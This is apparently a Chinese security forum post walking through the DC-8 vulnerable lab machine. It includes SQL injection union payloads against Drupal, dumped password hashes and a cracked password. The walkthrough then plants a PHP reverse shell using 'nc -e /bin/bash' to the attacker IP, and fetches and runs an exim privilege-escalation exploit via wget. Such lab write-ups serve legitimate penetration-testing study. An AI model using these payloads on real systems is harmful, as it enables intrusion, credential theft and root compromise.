安全矩阵

 找回密码
 立即注册
搜索
查看: 2007|回复: 0

DC8

[复制链接]

63

主题

125

帖子

457

积分

中级会员

Rank: 3Rank: 3

积分
457
发表于 2021-11-3 16:25:02 | 显示全部楼层 |阅读模式
DC8
kali:192.168.0.105
DC8:192.168.0.160
nmap -T4 -A -p- 192.168.0.160
同样是80端口和robots.txt
drupal网站
且这个版本可以sql注入
sqlmap跑一下
/?nid=-1 union select group_concat(table_name) from information_schema.tables where table_schema=database() --+

/?nid=-1 union select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users' --+
爆出users表中name、pass列的数据,爆出两个用户名admin和john及密码加密后的密文



           

adminS$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z

           

  •        

johnS$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF

           

提示有john用户。需要用john工具爆破密码

得到密码turtle
用这个用户登录网站
在左上角Find content - Contact Us- edit-右上角WEBFORM-Form settings处通过xss储存漏洞可以植入反弹shell
<p>GETSHELL</p>
<script>alert(1)</script>
<?php
system("nc -e /bin/bash 192.168.0.105 6666");
?>

ok
python -c 'import pty;pty.spawn("/bin/bash")' 提权
使用find命令查找具有suid权限的命令
找到一个exim4命令,exim是一款在Unix系统上使用的邮件服务,exim4在使用时具有root权限
DC-7有讲过

查找exim4当前的版本号
/usr/sbin/exim4 –version
为4.89
查找exim的漏洞攻击脚本,找到46996.sh脚本文件
searchsploit exim
将46996.sh拷贝到本地并改名,并在kali开启http服务
cp /usr/share/exploitdb/exploits/linux/local/46996.sh getShell.sh
cat getShell.sh
python -m SimpleHTTPServer

在靶机上将getShell.sh脚本文件下载到靶机本地,并给脚本赋予执行权限
wget http://192.168.0.105:8000/getShell.sh

chmod 777 getShell.sh

没有下载权限
后来尝试了各种方法包括apache
两个root加权
换到tmp目录,等等都不行


用powershell可以下载
说明不是kali里面的问题,而是靶机权限的问题
想不粗来了
后来尝试好久发现靶机cd /tmp后
居然可以下载了???
需要cd到/tmp里面因为这个靶机一进去本身是个地权限,然后只有到tmp里面才有读写,创建,下载文件


搜索发现这个报错是由于windows下编辑上传到linux下执行导致的
本地编辑查看文件类型 :set ff?,会出现 dos或unix格式,如果为dos,需要改为unix模式
编辑一下脚本,加上set ff=unix

ok

ok
比较有意思的是,这篇昨天做的,衡阳信安社区今天也复现了这个。
都讲到那个/tmp,盲猜大佬看到了我向群里和其他大佬问的问题和交流

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-3-2 08:21 , Processed in 0.011493 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表